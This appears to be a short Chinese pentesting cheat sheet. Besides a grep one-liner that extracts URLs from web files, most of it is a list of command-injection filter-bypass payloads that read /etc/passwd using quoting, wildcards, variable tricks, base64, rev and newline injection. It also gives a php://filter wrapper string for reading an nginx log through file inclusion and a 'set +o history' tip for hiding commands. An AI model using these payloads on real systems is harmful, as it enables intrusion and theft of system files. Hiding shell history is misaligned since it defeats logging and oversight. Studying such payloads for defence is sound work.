杂技学习

 · 2021-11-3 · 次阅读


利用grep语法筛选出html中的重要信息:

curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*

image

image

命令注入bypass

cat /etc/passwd 
cat /e"t"c/pa"s"swd 
cat /'e'tc/pa's' swd 
cat /etc/pa??wd 
cat /etc/pa*wd 
cat /et' 'c/passw' 'd 
cat /et$()c/pa$()$swd
cat /et${neko}c/pas${poi} swd 
*echo "dwssap/cte/ tac" | rev 
$(echo Y2FOIC9ldGMvcGFzc3dkCg== base64 -d) 
w\ho\am\i 
/\b\i\n/////s\h 
who$@ami 
xyz%0Acat%20/etc/passwd 
IFS=,;`cat<<<uname,-a`
/???/??t /???/p??s?? 
test=/ehhh/hmtc/pahhh/hmsswd 
cat ${test//hhh\/hm/} 
cat ${test//hh??hm/}
cat /???/?????d
{cat,/etc/passwd}

filter过滤base字段:

action=php://filter/read=string.toupper|string.rot13/resource=/var/log/nginx/access.log

set +o history设置命令不记录

set -o history恢复